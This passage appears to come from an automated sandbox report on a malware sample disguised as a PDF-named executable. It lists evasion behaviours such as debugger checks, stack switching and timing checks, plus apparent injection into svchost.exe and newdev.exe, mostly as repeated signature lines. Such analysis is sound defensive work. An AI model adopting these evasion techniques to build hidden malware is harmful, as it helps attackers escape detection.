              Source: C:\Windows\SysWOW64\newdev.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeAPI/Special instruction interceptor: Address: 20E3214
              Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF88A54D144
              Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF88A550594
              Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF88A54FF74
              Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF88A54D6C4
              Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF88A54D864
              Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF88A54D004
              Source: C:\Windows\SysWOW64\newdev.exeAPI/Special instruction interceptor: Address: 7FF88A54D144
              Source: C:\Windows\SysWOW64\newdev.exeAPI/Special instruction interceptor: Address: 7FF88A550594
              Source: C:\Windows\SysWOW64\newdev.exeAPI/Special instruction interceptor: Address: 7FF88A54D764
              Source: C:\Windows\SysWOW64\newdev.exeAPI/Special instruction interceptor: Address: 7FF88A54D324
              Source: C:\Windows\SysWOW64\newdev.exeAPI/Special instruction interceptor: Address: 7FF88A54D364
              Source: C:\Windows\SysWOW64\newdev.exeAPI/Special instruction interceptor: Address: 7FF88A54D004
              Source: C:\Windows\SysWOW64\newdev.exeAPI/Special instruction interceptor: Address: 7FF88A54FF74
              Source: C:\Windows\SysWOW64\newdev.exeAPI/Special instruction interceptor: Address: 7FF88A54D6C4
              Source: C:\Windows\SysWOW64\newdev.exeAPI/Special instruction interceptor: Address: 7FF88A54D864
              Source: C:\Windows\SysWOW64\newdev.exeAPI/Special instruction interceptor: Address: 7FF88A54D604
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7088E rdtsc 1_2_03C7088E
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeEvaded block: after key decisiongraph_0-93593
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeEvaded block: after key decisiongraph_0-94688
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-94117
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeAPI coverage: 4.3 %
              Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.8 %
              Source: C:\Windows\SysWOW64\newdev.exeAPI coverage: 1.3 %
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe TID: 2796Thread sleep count: 86 > 30Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe TID: 2796Thread sleep time: -430000s >= -30000sJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeLast function: Thread delayed
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00386CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00386CA9
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_003860DD FindFirstFileW,DeleteFileW,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_003860DD
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_003863F9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,0_2_003863F9
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0038EB60 FindFirstFileW,FindNextFileW,FindClose,0_2_0038EB60
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0038F56F FindFirstFileW,FindClose,0_2_0038F56F
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0038F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,0_2_0038F5FA
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00391B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00391B2F
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00391C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00391C8A
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00391F94 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00391F94
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0035DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0035DDC0
              Source: newdev.exe, 00000003.00000002.6803895083.0000000000B38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\"~
              Source: RAVCpl64.exe, 00000002.00000002.11193961061.0000000000577000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeAPI call chain: ExitProcess graph end nodegraph_0-93363
              Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7088E rdtsc 1_2_03C7088E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417723 LdrLoadDll,1_2_00417723
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00396AAF BlockInput,0_2_00396AAF
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00343D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00343D19
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00373920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00373920
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0035E01E LoadLibraryA,GetProcAddress,0_2_0035E01E
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_020E3480 mov eax, dword ptr fs:[00000030h]0_2_020E3480
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_020E34E0 mov eax, dword ptr fs:[00000030h]0_2_020E34E0
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_020E1E70 mov eax, dword ptr fs:[00000030h]0_2_020E1E70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E3C0 mov eax, dword ptr fs:[00000030h]1_2_03C2E3C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E3C0 mov eax, dword ptr fs:[00000030h]1_2_03C2E3C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E3C0 mov eax, dword ptr fs:[00000030h]1_2_03C2E3C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C3C7 mov eax, dword ptr fs:[00000030h]1_2_03C2C3C7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C363CB mov eax, dword ptr fs:[00000030h]1_2_03C363CB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C643D0 mov ecx, dword ptr fs:[00000030h]1_2_03C643D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE3DD mov eax, dword ptr fs:[00000030h]1_2_03CBE3DD
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB43D5 mov eax, dword ptr fs:[00000030h]1_2_03CB43D5
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A390 mov eax, dword ptr fs:[00000030h]1_2_03C5A390
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A390 mov eax, dword ptr fs:[00000030h]1_2_03C5A390
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5A390 mov eax, dword ptr fs:[00000030h]1_2_03C5A390
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAC3B0 mov eax, dword ptr fs:[00000030h]1_2_03CAC3B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28347 mov eax, dword ptr fs:[00000030h]1_2_03C28347
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28347 mov eax, dword ptr fs:[00000030h]1_2_03C28347
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28347 mov eax, dword ptr fs:[00000030h]1_2_03C28347
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A350 mov eax, dword ptr fs:[00000030h]1_2_03C6A350
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E363 mov eax, dword ptr fs:[00000030h]1_2_03C6E363
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E363 mov eax, dword ptr fs:[00000030h]1_2_03C6E363
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E363 mov eax, dword ptr fs:[00000030h]1_2_03C6E363
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E363 mov eax, dword ptr fs:[00000030h]1_2_03C6E363
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E363 mov eax, dword ptr fs:[00000030h]1_2_03C6E363
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E363 mov eax, dword ptr fs:[00000030h]1_2_03C6E363
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E363 mov eax, dword ptr fs:[00000030h]1_2_03C6E363
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E363 mov eax, dword ptr fs:[00000030h]1_2_03C6E363
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE372 mov eax, dword ptr fs:[00000030h]1_2_03CAE372
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE372 mov eax, dword ptr fs:[00000030h]1_2_03CAE372
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE372 mov eax, dword ptr fs:[00000030h]1_2_03CAE372
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE372 mov eax, dword ptr fs:[00000030h]1_2_03CAE372
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0371 mov eax, dword ptr fs:[00000030h]1_2_03CB0371
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0371 mov eax, dword ptr fs:[00000030h]1_2_03CB0371
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5237A mov eax, dword ptr fs:[00000030h]1_2_03C5237A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E310 mov eax, dword ptr fs:[00000030h]1_2_03C4E310
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E310 mov eax, dword ptr fs:[00000030h]1_2_03C4E310
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E310 mov eax, dword ptr fs:[00000030h]1_2_03C4E310
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6631F mov eax, dword ptr fs:[00000030h]1_2_03C6631F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68322 mov eax, dword ptr fs:[00000030h]1_2_03C68322
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68322 mov eax, dword ptr fs:[00000030h]1_2_03C68322
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68322 mov eax, dword ptr fs:[00000030h]1_2_03C68322
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E328 mov eax, dword ptr fs:[00000030h]1_2_03C2E328
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E328 mov eax, dword ptr fs:[00000030h]1_2_03C2E328
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E328 mov eax, dword ptr fs:[00000030h]1_2_03C2E328
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2E0 mov eax, dword ptr fs:[00000030h]1_2_03C3A2E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2E0 mov eax, dword ptr fs:[00000030h]1_2_03C3A2E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2E0 mov eax, dword ptr fs:[00000030h]1_2_03C3A2E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2E0 mov eax, dword ptr fs:[00000030h]1_2_03C3A2E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2E0 mov eax, dword ptr fs:[00000030h]1_2_03C3A2E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2E0 mov eax, dword ptr fs:[00000030h]1_2_03C3A2E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C382E0 mov eax, dword ptr fs:[00000030h]1_2_03C382E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C382E0 mov eax, dword ptr fs:[00000030h]1_2_03C382E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C382E0 mov eax, dword ptr fs:[00000030h]1_2_03C382E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C382E0 mov eax, dword ptr fs:[00000030h]1_2_03C382E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402F9 mov eax, dword ptr fs:[00000030h]1_2_03C402F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402F9 mov eax, dword ptr fs:[00000030h]1_2_03C402F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402F9 mov eax, dword ptr fs:[00000030h]1_2_03C402F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402F9 mov eax, dword ptr fs:[00000030h]1_2_03C402F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402F9 mov eax, dword ptr fs:[00000030h]1_2_03C402F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402F9 mov eax, dword ptr fs:[00000030h]1_2_03C402F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402F9 mov eax, dword ptr fs:[00000030h]1_2_03C402F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402F9 mov eax, dword ptr fs:[00000030h]1_2_03C402F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE289 mov eax, dword ptr fs:[00000030h]1_2_03CAE289
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C542AF mov eax, dword ptr fs:[00000030h]1_2_03C542AF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C542AF mov eax, dword ptr fs:[00000030h]1_2_03C542AF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C2B0 mov ecx, dword ptr fs:[00000030h]1_2_03C2C2B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A200 mov eax, dword ptr fs:[00000030h]1_2_03C2A200
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2821B mov eax, dword ptr fs:[00000030h]1_2_03C2821B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0227 mov eax, dword ptr fs:[00000030h]1_2_03CB0227
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0227 mov eax, dword ptr fs:[00000030h]1_2_03CB0227
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0227 mov eax, dword ptr fs:[00000030h]1_2_03CB0227
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A22B mov eax, dword ptr fs:[00000030h]1_2_03C6A22B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A22B mov eax, dword ptr fs:[00000030h]1_2_03C6A22B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A22B mov eax, dword ptr fs:[00000030h]1_2_03C6A22B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50230 mov ecx, dword ptr fs:[00000030h]1_2_03C50230
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C401C0 mov eax, dword ptr fs:[00000030h]1_2_03C401C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C401C0 mov eax, dword ptr fs:[00000030h]1_2_03C401C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A1E3 mov eax, dword ptr fs:[00000030h]1_2_03C3A1E3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A1E3 mov eax, dword ptr fs:[00000030h]1_2_03C3A1E3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A1E3 mov eax, dword ptr fs:[00000030h]1_2_03C3A1E3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A1E3 mov eax, dword ptr fs:[00000030h]1_2_03C3A1E3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A1E3 mov eax, dword ptr fs:[00000030h]1_2_03C3A1E3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF81EE mov eax, dword ptr fs:[00000030h]1_2_03CF81EE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF81EE mov eax, dword ptr fs:[00000030h]1_2_03CF81EE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C281EB mov eax, dword ptr fs:[00000030h]1_2_03C281EB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C401F1 mov eax, dword ptr fs:[00000030h]1_2_03C401F1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C401F1 mov eax, dword ptr fs:[00000030h]1_2_03C401F1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C401F1 mov eax, dword ptr fs:[00000030h]1_2_03C401F1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34180 mov eax, dword ptr fs:[00000030h]1_2_03C34180
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34180 mov eax, dword ptr fs:[00000030h]1_2_03C34180
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34180 mov eax, dword ptr fs:[00000030h]1_2_03C34180
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E1A4 mov eax, dword ptr fs:[00000030h]1_2_03C6E1A4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E1A4 mov eax, dword ptr fs:[00000030h]1_2_03C6E1A4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C641BB mov ecx, dword ptr fs:[00000030h]1_2_03C641BB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C641BB mov eax, dword ptr fs:[00000030h]1_2_03C641BB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C641BB mov eax, dword ptr fs:[00000030h]1_2_03C641BB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A147 mov eax, dword ptr fs:[00000030h]1_2_03C2A147
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A147 mov eax, dword ptr fs:[00000030h]1_2_03C2A147
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A147 mov eax, dword ptr fs:[00000030h]1_2_03C2A147
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6415F mov eax, dword ptr fs:[00000030h]1_2_03C6415F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36179 mov eax, dword ptr fs:[00000030h]1_2_03C36179
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60118 mov eax, dword ptr fs:[00000030h]1_2_03C60118
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBA130 mov eax, dword ptr fs:[00000030h]1_2_03CBA130
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC0E0 mov ecx, dword ptr fs:[00000030h]1_2_03CBC0E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C0F6 mov eax, dword ptr fs:[00000030h]1_2_03C2C0F6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04080 mov eax, dword ptr fs:[00000030h]1_2_03D04080
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04080 mov eax, dword ptr fs:[00000030h]1_2_03D04080
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04080 mov eax, dword ptr fs:[00000030h]1_2_03D04080
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04080 mov eax, dword ptr fs:[00000030h]1_2_03D04080
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04080 mov eax, dword ptr fs:[00000030h]1_2_03D04080
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04080 mov eax, dword ptr fs:[00000030h]1_2_03D04080
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04080 mov eax, dword ptr fs:[00000030h]1_2_03D04080
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A093 mov ecx, dword ptr fs:[00000030h]1_2_03C2A093
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C090 mov eax, dword ptr fs:[00000030h]1_2_03C2C090
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6090 mov eax, dword ptr fs:[00000030h]1_2_03CC6090
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C700A5 mov eax, dword ptr fs:[00000030h]1_2_03C700A5
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB60A0 mov eax, dword ptr fs:[00000030h]1_2_03CB60A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB60A0 mov eax, dword ptr fs:[00000030h]1_2_03CB60A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB60A0 mov eax, dword ptr fs:[00000030h]1_2_03CB60A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB60A0 mov eax, dword ptr fs:[00000030h]1_2_03CB60A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB60A0 mov eax, dword ptr fs:[00000030h]1_2_03CB60A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB60A0 mov eax, dword ptr fs:[00000030h]1_2_03CB60A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB60A0 mov eax, dword ptr fs:[00000030h]1_2_03CB60A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60044 mov eax, dword ptr fs:[00000030h]1_2_03C60044
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6040 mov eax, dword ptr fs:[00000030h]1_2_03CB6040
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36074 mov eax, dword ptr fs:[00000030h]1_2_03C36074
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36074 mov eax, dword ptr fs:[00000030h]1_2_03C36074
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38009 mov eax, dword ptr fs:[00000030h]1_2_03C38009
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72010 mov ecx, dword ptr fs:[00000030h]1_2_03C72010
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E7E0 mov eax, dword ptr fs:[00000030h]1_2_03C5E7E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE79D mov eax, dword ptr fs:[00000030h]1_2_03CAE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE79D mov eax, dword ptr fs:[00000030h]1_2_03CAE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE79D mov eax, dword ptr fs:[00000030h]1_2_03CAE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE79D mov eax, dword ptr fs:[00000030h]1_2_03CAE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE79D mov eax, dword ptr fs:[00000030h]1_2_03CAE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE79D mov eax, dword ptr fs:[00000030h]1_2_03CAE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE79D mov eax, dword ptr fs:[00000030h]1_2_03CAE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE79D mov eax, dword ptr fs:[00000030h]1_2_03CAE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE79D mov eax, dword ptr fs:[00000030h]1_2_03CAE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C307A7 mov eax, dword ptr fs:[00000030h]1_2_03C307A7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CCC7B0 mov eax, dword ptr fs:[00000030h]1_2_03CCC7B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CCC7B0 mov eax, dword ptr fs:[00000030h]1_2_03CCC7B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52755 mov eax, dword ptr fs:[00000030h]1_2_03C52755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52755 mov eax, dword ptr fs:[00000030h]1_2_03C52755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52755 mov eax, dword ptr fs:[00000030h]1_2_03C52755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52755 mov ecx, dword ptr fs:[00000030h]1_2_03C52755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52755 mov eax, dword ptr fs:[00000030h]1_2_03C52755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52755 mov eax, dword ptr fs:[00000030h]1_2_03C52755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A750 mov eax, dword ptr fs:[00000030h]1_2_03C6A750
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE750 mov eax, dword ptr fs:[00000030h]1_2_03CDE750
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C42760 mov ecx, dword ptr fs:[00000030h]1_2_03C42760
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60774 mov eax, dword ptr fs:[00000030h]1_2_03C60774
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34779 mov eax, dword ptr fs:[00000030h]1_2_03C34779
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34779 mov eax, dword ptr fs:[00000030h]1_2_03C34779
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5270D mov eax, dword ptr fs:[00000030h]1_2_03C5270D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5270D mov eax, dword ptr fs:[00000030h]1_2_03C5270D
